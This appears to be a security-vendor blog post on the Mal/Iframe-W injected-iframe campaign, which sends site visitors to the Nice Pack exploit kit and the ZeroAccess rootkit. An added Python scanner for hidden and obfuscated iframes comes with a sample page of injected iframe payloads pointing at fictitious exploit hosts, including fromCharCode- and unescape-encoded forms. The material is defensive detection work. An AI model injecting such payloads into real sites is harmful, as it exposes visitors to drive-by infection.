One of the most prevalent scripts we have seen used to compromise legitimate web sites over the past few months is one our products block as Mal/Iframe-W. The threat name describes the payload: an iframe that loads content from a remote site. In this post I will elaborate a little more on the threat, and on how it is being used to infect users.
The script obfuscation uses a variety of anti-emulation tricks, in an attempt to evade generic detection, and break automated analysis systems.
Once deobfuscated, the script payload is obvious: an iframe to load further malicious content.
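The post does not reproduce the deobfuscation itself, so here is an added example (my own code, not SophosLabs' and not the Mal/Iframe-W decoder) of the check a site owner can run over their own pages once the payload shape is known: it flags `<iframe>` elements a visitor would never see (zero or 1 pixel, `display:none`, `visibility:hidden`, pushed off-screen) and scripts that only produce an `<iframe>` after `String.fromCharCode` or `unescape` is folded ahead of a `document.write`. The heuristics are generic drive-by patterns, not a description of this specific threat's obfuscation, and every hostname in the sample page is invented.

```python
"""Static scan of an HTML page for injected, invisible iframes.

Added example, not code from the original post. It folds the two most common
string-building tricks (String.fromCharCode and unescape) before looking for an
<iframe>, and reports iframes whose size or style hides them from the visitor.
"""
import re
from collections import namedtuple
from html.parser import HTMLParser
from urllib.parse import unquote

Finding = namedtuple("Finding", "kind src reason")

_FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)")
_UNESCAPE = re.compile(r"""unescape\s*\(\s*(["'])(.*?)\1\s*\)""", re.S)
_SRC = re.compile(r"""src\s*=\s*["']?([^"' >]+)""", re.I)


def decode_strings(js, rounds=5):
    """Fold String.fromCharCode(...) and unescape('...') calls into literal text.
    Repeats so nested layers unwrap; stops early once nothing changes."""
    for _ in range(rounds):
        new = _FROMCHARCODE.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), js)
        new = _UNESCAPE.sub(lambda m: unquote(m.group(2)), new)
        if new == js:
            break
        js = new
    return js


def hidden_reason(attrs):
    """Return why an <iframe> with these attributes is invisible, or None."""
    if "hidden" in attrs:
        return "hidden attribute"
    for dim in ("width", "height"):
        v = (attrs.get(dim) or "").strip().lower().removesuffix("px")
        if v.isdigit() and int(v) <= 1:          # 0x0 or 1x1 pixel frames
            return f"{dim}={v}"
    style = {}
    for decl in (attrs.get("style") or "").split(";"):
        if ":" in decl:
            k, v = decl.split(":", 1)
            style[k.strip().lower()] = v.strip().lower()
    if style.get("display") == "none":
        return "display:none"
    if style.get("visibility") == "hidden":
        return "visibility:hidden"
    for dim in ("width", "height"):
        if re.fullmatch(r"0+(px|%)?", style.get(dim, "")):
            return f"style {dim}:0"
    for edge in ("left", "top"):
        if style.get(edge, "").startswith("-"):   # positioned off-screen
            return f"off-screen ({edge}:{style[edge]})"
    return None


class IframeScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None   # list of text chunks while inside <script>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            why = hidden_reason(a)
            if why:
                self.findings.append(Finding("hidden-iframe", a.get("src") or "", why))
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            js, self._script = "".join(self._script), None
            decoded = decode_strings(js)
            if "document.write" in js and "<iframe" in decoded.lower():
                m = _SRC.search(decoded)
                how = "obfuscated" if "<iframe" not in js.lower() else "plain"
                self.findings.append(Finding("script-built-iframe", m.group(1) if m else "",
                                             f"iframe assembled at run time ({how})"))


def scan(html):
    """Return every Finding for the given page source."""
    p = IframeScanner()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample page (hosts are fictitious): one legitimate embed, one injected
# 1x1 iframe, and two injected scripts whose iframe only appears after decoding.
_PAYLOAD = '<iframe src="http://ek.example.invalid/in.php" width=0 height=0></iframe>'
_CODES = ",".join(str(ord(c)) for c in _PAYLOAD)
SAMPLE_HTML = ("""<html><body>
<h1>Welcome</h1>
<iframe src="https://video.example.com/embed/123" width="640" height="360"></iframe>
<script>document.write("<p>Last updated today</p>");</script>
<iframe src="http://tds.example.invalid/in.cgi?3" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(String.fromCharCode(""" + _CODES + """));</script>
<script>document.write(unescape('%3Ciframe src%3D%22http%3A%2F%2Fek2.example.invalid%2F%22 style%3D%22display%3Anone%22%3E%3C%2Fiframe%3E'));</script>
</body></html>""")

if __name__ == "__main__":
    for f in scan(SAMPLE_HTML):
        print(f"{f.kind:22} {f.src:40} {f.reason}")
```

Run it against a page fetched from the server itself (not through a browser, since the injection may be served only to certain User-Agents or referrers), and treat any `script-built-iframe` hit as the interesting one: a legitimate site rarely needs to hide an iframe behind `fromCharCode`.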
Hordes of sites, all over the world, have been hit in these site defacements. Last week, their victims included the French site of a global car manufacturer. (Following our notification to them, the site has now been cleaned up, thankfully.)
Historically, Mal/Iframe-W has been used to drive traffic to Blackhole exploit sites (similar to here), in order to infect users with a variety of payloads.
In the last couple of weeks however, I have seen Mal/Iframe-W being used to send traffic to a different exploit kit – one known as ‘Nice Pack’. The attack is being used to infect users with a threat called ZeroAccess, a nasty rootkit.
As you can see, protection from these attacks is achieved at multiple levels:
- tracking the threat enables us to blacklist all sites known to be associated with this attack
- blocking of compromised web pages as Mal/Iframe-W
- blocking of the TDS redirect script as Mal/Iframe-W
- blocking of the Nice Pack exploit site as Mal/ExpJS-Y
- ZeroAccess dropper is detected as Troj/Sirefef-P, or generically as Mal/FakeAV-IS
Of course, exploit kits are typically distinct from the payloads they are used to deliver. It is the familiar drive-by download model, where hackers looking to infect users with some specific malware simply:
- purchase the kit to construct and manage the exploit site
- purchase the user traffic
- profit from users who get infected with their malware
The traffic directing server (TDS) illustrated in the above flowchart emphasises how the user traffic is a commodity. This server is under the hacker's control, so by injecting code into legitimate sites that sends visitors' browsers to the TDS, the hacker is able to control the final destination of that traffic. It can be sold on to other hackers, who own and manage the exploit sites.